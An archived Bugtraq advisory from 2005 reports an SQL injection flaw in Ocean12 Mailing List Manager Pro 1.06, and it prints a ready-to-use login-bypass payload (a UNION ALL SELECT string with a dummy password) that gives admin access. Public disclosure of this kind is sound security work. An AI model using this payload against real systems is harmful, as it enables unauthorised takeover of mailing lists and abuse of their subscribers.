Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[HSC Security Group] Ocean12 Mailing List Manager Pro SQL injection

from [Zinho] Network Security [Permanent Link]
Subject: [HSC Security Group] Ocean12 Mailing List Manager Pro SQL injection
Date: 28 Apr 2005 23:32:42 -0000 


Hackers Center Security Group (http://www.hackerscenter.com/)         
Zinho's Security Advisory          

Desc: SQL injection : Ocean12 Mailing list manager PRO 1.06 
Vendor: www.ocean12scripts.com 
Risk: High  


An sql injection allows anyone to login as admin using this sql query in  the 
login panel: 

Admin_id: Admin' UNION ALL SELECT   id,id,id,id,id,id,id,id,id,id,id,id,id,id 
FROM settings WHERE  Admin_id='Admin 
Admin_Password: 1 

Of course this is a serious flaw that can lead to mail bombing anyone  
subscribed to the mailing list and taking full control over the list. 


Vendor has been contacted several weeks ago. Noone replied. 


Author:          
Zinho is webmaster and founder of http://www.hackerscenter.com ,       
Security research   portal        
Secure Web Hosting Companies Reviewed:       
http://www.securityforge.com/web-hosting/secure-web-hosting.asp       

zinho-no-spam @ hackerscenter.com
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [HSC Security Group] Ocean12 Mailing List Manager Pro SQL injection, Zinho <=
Previous by Date:  File appending vulnerability in Oracle Webcache 9i, Alexander Kornbrust
Next by Date:  Cross Site Scripting in BEA Admin Console, Alexander Kornbrust
Previous by Thread:  File appending vulnerability in Oracle Webcache 9i, Alexander Kornbrust
Next by Thread:  Cross Site Scripting in BEA Admin Console, Alexander Kornbrust
Indexes:  [Date] [Thread] [Top] [All Lists]